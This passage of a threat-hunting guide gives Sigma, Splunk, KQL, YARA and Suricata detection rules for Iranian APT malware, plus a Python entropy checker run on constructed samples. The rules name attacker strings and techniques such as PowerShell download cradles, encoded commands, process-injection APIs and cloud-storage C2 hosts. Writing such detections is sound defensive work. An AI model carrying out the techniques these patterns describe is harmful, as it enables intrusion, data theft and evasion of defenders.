description: Detects obfuscated files associated with Iranian APT malware
logsource:
  product: windows
  service: sysmon
  definition: 'Requirements: Sysmon EventID 11 with file entropy calculation'
detection:
  selection_high_entropy:
    EventID: 11
    FileEntropy|gt: 7.5
  selection_suspicious_location:
    EventID: 11
    TargetFilename|contains:
      - '\Temp\'
      - '\AppData\'
      - '\ProgramData\'
    TargetFilename|endswith:
      - '.tmp'
      - '.dat'
      - '.bin'
      - '.db'
  selection_double_extension:
    EventID: 11
    TargetFilename|re: '(?i).*\.(jpg|png|pdf|doc|xls)\.(exe|scr|bat|cmd|ps1)$'
  condition: selection_high_entropy or selection_suspicious_location or selection_double_extension
falsepositives:
  - Encrypted files
  - Compressed archives
level: medium
Calculate Shannon entropy for dropped files. Alert on files with entropy > 7.5. Monitor for rapid file creation/deletion patterns.
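Added example (not the guide's code) for the entropy check: Shannon entropy of a dropped file against the 7.5 threshold, combined with the staging-directory and double-extension checks from the rule, and skipping containers that are high-entropy by design, which is how the rule's listed false positives (encrypted files, archives) are kept out. Paths, file bytes and the magic-number list are constructed for this example.

```python
import math
import re
from collections import Counter
from typing import List

ENTROPY_THRESHOLD = 7.5   # from the hunt guide; 8.0 is the maximum for byte data
STAGING_DIR = re.compile(r"(?i)\\(temp|appdata|programdata)\\")
OPAQUE_EXT = re.compile(r"(?i)\.(tmp|dat|bin|db)$")
DOUBLE_EXT = re.compile(r"(?i)\.(jpg|png|pdf|doc|xls)\.(exe|scr|bat|cmd|ps1)$")
# Containers that are high-entropy by design: zip, jpeg, png, gzip, 7z
COMPRESSED_MAGIC = (b"PK\x03\x04", b"\xff\xd8\xff", b"\x89PNG", b"\x1f\x8b", b"7z\xbc\xaf")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant stream, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def assess_dropped_file(path: str, data: bytes) -> List[str]:
    """Reasons a newly created file matches the obfuscation hunt; empty means no hit."""
    reasons: List[str] = []
    if shannon_entropy(data) > ENTROPY_THRESHOLD and not data.startswith(COMPRESSED_MAGIC):
        reasons.append("high-entropy")
    if STAGING_DIR.search(path) and OPAQUE_EXT.search(path):
        reasons.append("opaque-file-in-staging-dir")
    if DOUBLE_EXT.search(path):
        reasons.append("double-extension")
    return reasons


# Constructed samples (not real files): a near-uniform byte stream stands in for an
# encrypted payload, a zip header plus the same bytes for a legitimate archive
UNIFORM = bytes(range(256)) * 4
SAMPLE_FILES = [
    (r"C:\Users\bob\AppData\Local\Temp\cfg.dat", UNIFORM),
    (r"C:\Users\bob\Downloads\invoice.pdf.exe", b"MZ" + b"\x00" * 500),
    (r"C:\Users\bob\AppData\Local\Temp\photos.zip", b"PK\x03\x04" + UNIFORM),
    (r"C:\Program Files\App\app.dll", b"\x00" * 1000),
]


def hunt(files=SAMPLE_FILES):
    """Only the files with at least one reason, keyed by path."""
    return {p: r for p, d in files if (r := assess_dropped_file(p, d))}
```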
T1083 — File and Directory Discovery (Discovery) [P3]
Iranian APTs perform extensive reconnaissance to identify high-value data before exfiltration
Splunk SPL:
index=windows (EventCode=4663 OR EventCode=1 OR EventCode=4688 OR EventCode=4104) | eval cmd=coalesce(CommandLine, ScriptBlockText) | eval recon_commands=if(match(cmd, "(?i)\b(dir|ls|tree|where|find|get-childitem|gci)\b"), 1, 0) | eval sensitive_paths=if(match(coalesce(ObjectName, cmd), "(?i)(desktop|documents|downloads|onedrive|sharepoint|\\\\.*\\.*\$|password|secret|confidential|classified)"), 1, 0) | eval rapid_discovery=if(EventCode=4663, 1, 0) | eventstats count as access_count by Computer, Account, ObjectName | where (recon_commands=1 AND sensitive_paths=1) OR (rapid_discovery=1 AND access_count > 100) | stats count by Computer, Account, cmd, ObjectName | sort -count
Elastic KQL:
(event.code:(4663 OR 1 OR 4688 OR 4104)) AND ((process.command_line.text:(dir OR ls OR tree OR where OR find OR get-childitem OR gci) AND process.command_line:(*desktop* OR *documents* OR *downloads* OR *onedrive* OR *sharepoint* OR *password* OR *secret* OR *confidential* OR *classified*)) OR (event.code:4663 AND winlog.event_data.ObjectName:(*desktop* OR *documents* OR *downloads* OR *onedrive* OR *sharepoint* OR *password* OR *secret* OR *confidential* OR *classified*)))
Sigma Rule:
title: Iranian APT File Discovery Activity
id: ef9b9f9d-ce91-af9b-dd5a-7e9d9ead9aaf
status: stable
description: Detects reconnaissance activity for high-value files
logsource:
  product: windows
detection:
  selection_recon_commands:
    EventID:
      - 1
      - 4688
    CommandLine|contains:
      - 'dir '
      - 'ls '
      - 'tree '
      - 'where '
      - 'find '
      - 'get-childitem'
      - 'gci '
  selection_sensitive_paths:
    - ObjectName|contains:
        - 'desktop'
        - 'documents'
        - 'downloads'
        - 'onedrive'
        - 'sharepoint'
        - 'password'
        - 'secret'
        - 'confidential'
        - 'classified'
    - CommandLine|contains:
        - 'desktop'
        - 'documents'
        - 'downloads'
        - 'onedrive'
        - 'sharepoint'
        - 'password'
        - 'secret'
        - 'confidential'
        - 'classified'
  condition: selection_recon_commands and selection_sensitive_paths
falsepositives:
  - System administrators
  - Backup software
level: medium
Baseline normal file access patterns. Alert on access to multiple sensitive directories in short timeframe. Monitor for recursive directory listings.
YARA Rules
Iranian_APT_HYPERSCRAPE_Indicators — Detects HYPERSCRAPE malware based on behavioral patterns and strings
rule Iranian_APT_HYPERSCRAPE_Indicators {
    meta:
        description = "Detects HYPERSCRAPE malware used by Iranian APT groups"
        author = "Threat Hunt Team"
        date = "2024-01-15"
        reference = "Iranian APT Campaign Analysis"
        severity = "high"
        mitre_attack = "T1055, T1059.001"
    strings:
        $str1 = "HYPERSCRAPE" ascii wide nocase
        $str2 = "scrape_config" ascii
        $str3 = "exfil_data" ascii
        $str4 = "cloud_upload" ascii
        $ps1 = "powershell.exe" ascii wide nocase
        $ps2 = "-EncodedCommand" ascii wide nocase
        $ps3 = "Invoke-Expression" ascii wide nocase
        $ps4 = "DownloadString" ascii wide nocase
        $mutex1 = "Global\\HYPERSCRAPE_MTX" ascii wide
        $mutex2 = "Local\\scraper_active" ascii wide
        $c2_1 = ".storage.googleapis.com" ascii
        $c2_2 = ".1drv.com" ascii
        $c2_3 = ".sharepoint.com" ascii
        $hex_pattern = {48 8B ?? ?? ?? ?? ?? 48 89 ?? ?? ?? ?? ?? E8}
    condition:
        uint16(0) == 0x5A4D and filesize < 5MB and
        (2 of ($str*) or 2 of ($ps*) or 1 of ($mutex*) or 1 of ($c2_*) or $hex_pattern)
}
Iranian_APT_POWERLESS_Malware — Detects POWERLESS malware family used by Iranian threat actors
rule Iranian_APT_POWERLESS_Malware {
    meta:
        description = "Detects POWERLESS malware family used by Iranian APT groups"
        author = "Threat Hunt Team"
        date = "2024-01-15"
        reference = "Iranian APT Campaign Analysis"
        severity = "high"
        mitre_attack = "T1055, T1027"
    strings:
        $str1 = "POWERLESS" ascii wide nocase
        $str2 = "power_module" ascii
        $str3 = "inject_thread" ascii
        $str4 = "evade_detection" ascii
        $inject1 = "CreateRemoteThread" ascii
        $inject2 = "WriteProcessMemory" ascii
        $inject3 = "VirtualAllocEx" ascii
        $inject4 = "NtCreateThreadEx" ascii
        $obfusc1 = {00 00 00 00 ?? ?? ?? ?? [4-32] FF FF FF FF}
        $obfusc2 = {41 42 43 44 45 46 47 48 [8-16] 5A 59 58 57 56 55 54 53}
        $anti_debug = "IsDebuggerPresent" ascii
        $anti_vm = "VMwareService.exe" ascii wide
    condition:
        // The PE header and size checks must gate every branch, so the
        // three alternatives are grouped; without the outer parentheses
        // "and" binds tighter than "or" and only the first branch was gated.
        uint16(0) == 0x5A4D and filesize < 10MB and
        (
            (2 of ($str*) and 2 of ($inject*)) or
            (1 of ($str*) and $obfusc1 and $obfusc2) or
            (3 of ($inject*) and ($anti_debug or $anti_vm))
        )
}
Suricata Rules
SID 2024001 — Iranian APT Cloud C2 Communication - Google Storage
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Iranian APT Cloud C2 Communication - Google Storage"; flow:established,to_server; content:"GET"; http_method; content:".storage.googleapis.com"; http_host; pcre:"/\/[a-z0-9]{32,64}\.(bin|dat|tmp|db)/iU"; content:"User-Agent|3a 20|"; http_header; pcre:"/^User-Agent\x3a\x20(python|curl|wget|PowerShell)/Hmi"; threshold: type limit, track by_src, count 1, seconds 3600; reference:url,internal.threat.report/iranian-apt; classtype:trojan-activity; sid:2024001; rev:1;)
SID 2024002 — Iranian APT Cloud C2 Communication - Microsoft OneDrive
alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Iranian APT Cloud C2 Communication - Microsoft OneDrive"; flow:established,to_server; tls.sni; content:".com"; nocase; pcre:"/(^|\.)(1drv\.com|onedrive\.live\.com)$/i"; threshold: type threshold, track by_src, count 10, seconds 60; reference:url,internal.threat.report/iranian-apt; classtype:trojan-activity; sid:2024002; rev:1;)
SID 2024003 — Iranian APT Spearphishing Landing Page
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET PHISHING Iranian APT Spearphishing Landing Page"; flow:established,from_server; content:"200"; http_stat_code; content:"<title>"; http_server_body; nocase; pcre:"/<title>[^<]*(job|career|position|resume|\bcv\b)[^<]*<\/title>/iQ"; content:"<form"; http_server_body; nocase; content:"password"; http_server_body; distance:0; within:500; nocase; reference:url,internal.threat.report/iranian-apt; classtype:social-engineering; sid:2024003; rev:1;)
SID 2024004 — Iranian APT PowerShell Download Cradle
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Iranian APT PowerShell Download Cradle"; flow:established,to_server; content:"GET"; http_method; content:".ps1"; http_uri; nocase; pcre:"/\/(download|payload|update|script)[0-9]*\.ps1/iU"; content:"User-Agent|3a 20|WindowsPowerShell"; http_header; threshold: type limit, track by_src, count 1, seconds 600; reference:url,internal.threat.report/iranian-apt; classtype:trojan-activity; sid:2024004; rev:1;)
SID 2024005 — Iranian APT Proxy Chain Communication
alert tcp $HOME_NET any -> $EXTERNAL_NET [8080,8443,8888,9090,3128,1080] (msg:"ET TROJAN Iranian APT Proxy Chain Communication"; flow:established,to_server; dsize:3; content:"|05 01 00|"; depth:3; threshold: type both, track by_src, count 3, seconds 300; reference:url,internal.threat.report/iranian-apt; classtype:trojan-activity; sid:2024005; rev:1;)
Data Source Requirements
| Source | Required For | Notes |
|---|---|---|
| Sysmon | T1059.001, T1218.001, T1055, T1071.001, T1027, T1083 | Deploy Sysmon with enhanced configuration for process creation, network connections, and file creation events. Enable ProcessAccess for injection detection. |
| Windows PowerShell Operational Log | T1059.001, T1083 | Enable PowerShell ScriptBlock logging (Event ID 4104) and Module logging. Set to log all scripts regardless of risk level. |
| Windows Security Event Log | T1059.001, T1218.001, T1083 | Configure audit policies for process creation (4688) with command line auditing enabled. Enable object access auditing (4663) for sensitive directories. |
| Email Gateway Logs | T1566.001 | Ensure email gateway logs capture sender, recipient, subject, attachment names, and attachment hashes. Enable reputation scoring. |
| Office 365 Audit Logs | T1566.001 | Enable unified audit logging for all mailboxes. Configure retention for at least 90 days. Monitor for suspicious mail flow rules. |
| Proxy Logs | T1102, T1071.001 | Configure proxy to log full URLs, user agents, and data transfer volumes. Enable SSL inspection for cloud storage domains. |
| DNS Logs | T1102, T1071.001 | Enable DNS query logging on all DNS servers. Consider passive DNS collection for historical lookups. |
| EDR Telemetry | T1027, T1055 | Deploy EDR with behavioral detection capabilities. Enable memory protection and process injection detection modules. |
| Firewall Logs | T1071.001 | Log all outbound connections with GeoIP data. Enable logging for non-standard ports (8080, 8443, etc.). |